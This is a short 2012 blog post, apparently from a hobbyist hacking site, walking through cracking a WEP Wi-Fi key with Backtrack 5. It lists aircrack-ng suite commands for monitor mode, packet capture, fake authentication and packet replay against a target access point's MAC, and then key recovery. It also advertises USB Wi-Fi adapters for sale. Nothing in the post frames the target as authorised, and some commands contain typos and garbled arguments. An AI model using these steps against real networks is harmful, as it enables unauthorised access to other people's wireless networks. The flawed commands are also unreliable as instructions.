Friday, May 25, 2012

I will show you a good technic from Masterpiece Joshv06 from Skidhacker.com using Backtrack 5 to capture WEP key.

what ur need is External usb wifi, Backtrack 5, vmware.

if u dont have any External usb Wifi ur can buy from me as low rm80.

The command u will use in Root Command as below.

1) Airmon-ng 2) Airmon-ng start wlan0 3) Airodump-ng mon0 4) airodump-ng -c (your channerl) -w (encryption type)--bssid (MAC target) mon0

Open new Root Command

1)Aireplay-ng -1 0 -a (MAC target) mon0 2)Aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (Mac target) mon 0 and wait until you write Y.

Open new Root Command

1)Aircrack-ng wep*.cap

Tutorial Video from Skidhacker.com

Click Here

No comments:

Post a Comment